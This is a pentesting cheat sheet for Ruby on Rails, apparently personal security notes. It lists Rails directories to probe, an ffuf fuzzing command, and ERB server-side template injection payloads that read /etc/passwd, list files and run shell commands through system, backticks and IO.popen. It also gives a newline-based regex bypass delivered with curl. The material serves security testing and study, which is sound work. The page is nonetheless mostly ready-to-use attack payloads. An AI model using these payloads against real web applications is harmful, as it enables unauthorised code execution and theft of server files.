Ruby on Rails Pentesting

Ruby on Rails is a web application framework written in Ruby.

- [Ruby_on_Rails_Cheat_Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html)

Common Directories

/assets/application.css
/config
/Gemfile
/Gemfile.lock
/rails/info
/rails/info/properties
/rails/info/routes

In addition, it’s worth to fuzz under /rails/ directory as below.

ffuf -u https://example.com/rails/FUZZ -w wordlist.txt

ERB Template Injection

If target website uses ERB template which affects a page, we can inject malicious template.

text = "<%= 2*3 %>"
result = ERB.new(text).result(binding)
puts result

# expected result: 6

Payloads

Reference: Server Side Template Injection

<%= 2*3 %>

<%= self.methods %>
<%= self.method(:handle_POST).parameters %>

<!-- List files and directories -->
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>

<!-- Code Execution -->
<%= system('cat /etc/passwd') %>
<%= `ls -la /` %>
<%= IO.popen('ls /').readlines() %>

Regex Check Bypass

Reference: https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/

abc\n<%- 2*3 %>

We can also use curl command if we want to manipulate a payload which contains newline.
Below is an example for using the URL encoded payload <%= IO.popen('ls /').readlines() %>.

curl https://example.com/ -X POST -d 'abc
%3C%25%3D%20IO%2Epopen%28%27ls%20%2F%27%29%2Ereadlines%28%29%20%25%3E'